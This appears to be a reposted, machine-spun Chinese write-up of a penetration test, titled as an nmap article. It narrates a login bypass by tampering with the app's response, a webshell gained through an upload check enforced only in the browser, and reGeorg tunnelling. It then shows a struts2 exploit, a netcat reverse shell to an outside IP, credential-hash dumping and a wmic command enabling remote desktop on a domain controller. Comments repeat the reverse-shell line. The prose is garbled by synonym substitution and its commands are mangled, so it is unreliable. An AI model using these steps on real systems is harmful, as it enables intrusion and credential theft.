nmap端口扫描器

nmap端口扫描器

黑客资讯hacker2020-08-27 8:08:3319745A+A-

序言

seoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-138023-1597648247.png" style="margin:10px 1080x;padding:1080x;box-sizing:border-box;border-width:1px;border-style:solid;border-color:#EEEEEE;image-rendering:-webkit-optimize-contrast;max-width:90%;max-height:90%;cursor:zoom-in;" />

争做美德少年,肺炎疫情期内,坚决贯彻政府部门与企业的规定,无可奈何在家工作的我一如既往的收到了渗入检测的每日任务。


正篇

话不多说,进行。


01
 

信息内容收集

规矩,第一步先从信息内容收集刚开始。

对总体目标开展二级域名收集,并沒有发觉二级域名。

扫描仪网站导航文档,就一个后台管理网页登陆,别的一片空白发觉。

以后还开展了nmap端口扫描器,都没有发现什么有使用价值的难题。

没法,只有正脸硬刚了。PS:反映一下大家钢铁直男的性格特点


02
 

手工制作检测

根据各种漏洞扫描工具都不可以非常好的出示有效的信息内容,只能取出了我的burp,一步一步的去看看。

根据抓包软件发觉,在网址的登录处存有弱密码传送,恰好网址都没有短信验证码体制(即使表层上面有短信验证码,诸位老师傅还要去试着一下短信验证码播放的难题)。

在了解复位登陆密码的状况下,试着暴力行为枚举类型,看一下能否得奖。

提醒登录名不会有,表明今天运气不行啊。

又试着变更网址回应包来绕开网页登陆,也失败了。

不怕困难的我,又刚开始科学研究SQL引入,果然,SQL引入也不会有。

我这爆脾气,沒有领域模型构造系统漏洞、工程爆破不进去、SQL引入沒有……

早已刚开始提前准备滑水了,可是,忽然发觉了一个新情况。


03
 

扭转乾坤

因为滑水的姿态较为恰当(实际上信息内容收集的工作中一直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。

浏览器打开扫一扫二维码,发觉是这一网址的app版。

柳暗花明又一村~~

把app下载出来,对apk文件开展逆向分析。

无可奈何,逆向分析、代码审计这类物品,并并不是我所善于的方位,因此 鼓捣了好长时间都没有結果,因此进军app的登录及其传输数据层面的难题。


04
 

走上正轨

根据burp抓app的登录包,并试着改动数据信息,发觉,登录不正确时,登录的回应包数据信息为:

{"code":1}

这里未确定。

这才算是真实的扭转乾坤,app登录处存有业务流程逻辑漏洞,取得成功进到后台管理。

以后便是基本的后台管理系统漏洞发觉了。

在头像照片 处,能够 开展上传文件,检测发觉只在前端开发做限定,根据抓包软件改动,立即绕开,取得成功获得webshell。


05
 

reGeog proxifier开展内网渗透

在获得webshell之后,发觉服务器防火墙DMZ地区投射外网地址端口号80,应用基本lcx等反跳专用工具被电脑杀毒软件阻拦,试着webshell提权未果。

一筹莫展之时,想起能够 应用r eGeog proxifier正端口转发使自身进到内部网。

一顿操作以后,取得成功进到内部网。

进到内部网以后,根据信息内容收集,发觉一台内部网服务器存有struts2指令实行系统漏洞。

立即运行命令,nc反跳端口号:

nc -e cmd.exe 1.0.0.1 3389

应用powershell线上抓去当地hash,出现意外发觉该服务器登录过域控服务器,取得成功爬取到域控服务器的登陆密码。

根据域指令查寻域控服务器IP,试着远程桌面连接联接,但域控服务器的远程桌面连接仍未打开。

试着应用指令打开远程桌面连接,但cmd指令被限定,但能够 应用wmic指令。应用misc指令:

wmic / node:%pcname%/ USER:%pcaccount%PATHwin32_terminalservicesetting WHERE(__Class!=“”)CALL SetAllowTSConnections 1

取得成功登录域控服务器。

到此,此次渗入全过程圆满落幕~~


总结

整体而言,此次渗入還是做到了预估的总体目标,尽管全过程跌跌撞撞的,可是還是取得了自身要想的物品。

小结下此次渗入的知识要点:

1.信息内容收集很重要,全线信息内容收集别停

2.仔细很重要,不必忽略捕捉的每一条信息内容

3.确信你可以拿下他

文中创作者:酒仙桥六号军队

文中为安全性脉率栏目创作者公布,转截请标明:https://www.secpulse.com/archives/138023.html

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 青迟语酌2022-06-03 22:44:14
  • 觉一台内部网服务器存有struts2指令实行系统漏洞。 立即运行命令,nc反跳端口号:nc -e cmd.exe 1.0.0.1 3389 应用powershell线上抓去当地hash,出现意外发觉该服务器登录过域控服务器,取
  • 余安十驹2022-06-03 16:46:57
  •  SetAllowTSConnections 1 取得成功登录域控服务器。 到此,此次渗入全过程圆满落幕~~ 总结 整体而言,此次渗入還是做到了预估的总体目标,尽管全过程跌跌撞撞的,可是還是取得了自身
  • 晴枙千仐2022-06-03 20:52:18
  • 型构造系统漏洞、工程爆破不进去、SQL引入沒有…… 早已刚开始提前准备滑水了,可是,忽然发觉了一个新情况。 03  扭转乾坤 因为滑水的姿态较为恰当(实际上信息内容收集的工作中一直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一
  • 世味婉绾2022-06-03 21:13:31
  • 直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。 浏览器打开扫一扫二维码,发觉是这
  • 北槐北渚2022-06-03 13:50:23
  • 的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。 浏览器打开扫一扫二维码,发觉是这一网址的app版。 柳暗花明又一村~~ 把app下载出来,对apk文件开展逆向分析。 无可奈何,逆

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理